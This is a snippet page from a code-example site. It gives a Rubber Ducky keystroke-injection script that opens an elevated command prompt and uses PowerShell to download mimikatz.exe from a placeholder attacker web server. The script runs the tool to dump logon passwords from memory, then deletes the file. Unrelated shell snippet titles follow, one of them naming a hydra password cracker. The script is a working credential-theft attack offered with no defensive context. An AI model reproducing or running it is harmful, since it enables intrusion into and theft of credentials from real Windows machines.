Search
 
SCRIPT & CODE EXAMPLE
 

SHELL

15 second rubber ducky password

REM mimikatz ducky script to dump local wdigest passwords from memory using mimikatz (local user needs to be an administrator/have admin privs)
DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 300
ENTER
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<replace me with webserver ip/host>/mimikatz.exe','%TEMP%mimikatz.exe')
DELAY 300
ENTER
DELAY 3000
STRING %TEMP%mimikatz.exe
DELAY 300
ENTER
DELAY 3000
STRING privilege::debug
DELAY 300
ENTER
DELAY 1000
STRING sekurlsa::logonPasswords full
DELAY 300
ENTER
DELAY 1000
STRING exit
DELAY 300
ENTER
DELAY 100
STRING del %TEMP%mimikatz.exe
DELAY 300
ENTER
Comment

PREVIOUS NEXT
Code Example
Shell :: conda install multiprocess 
Shell :: powershell check if software is installed 
Shell :: how to turn on hotspot on windows 10 
Shell :: swagger installation 
Shell :: git push specific ssh key 
Shell :: ssh copy file from local to remote 
Shell :: install sweetlalert angular 
Shell :: push to git 
Shell :: ubuntu install yarn 
Shell :: Unable to find a valid SQLite command 
Shell :: unix set current time in file name 
Shell :: install torch 
Shell :: install ionic 6 
Shell :: git discard staged changes 
Shell :: hydra use find password cracker 
Shell :: give docker permission to non-root user in linux 
Shell :: gatsby-plugin-react-helmet npm 
Shell :: install font on linux 
Shell :: composer global install 
Shell :: how to check if your linux Server Is Under DDoS Attack 
Shell :: git pull branch 
Shell :: how to make a .sh file executable 
Shell :: how to update git 
Shell :: install kibana 7.17 ubuntu 
Shell :: restart docker 
Shell :: centos vmware guest mount shared folder 
Shell :: git stash docs 
Shell :: kubectl neat not found 
Shell :: split sh string 
Shell :: how to download a file with curl 
ADD CONTENT
Topic
Content
Source link
Name
5+1 =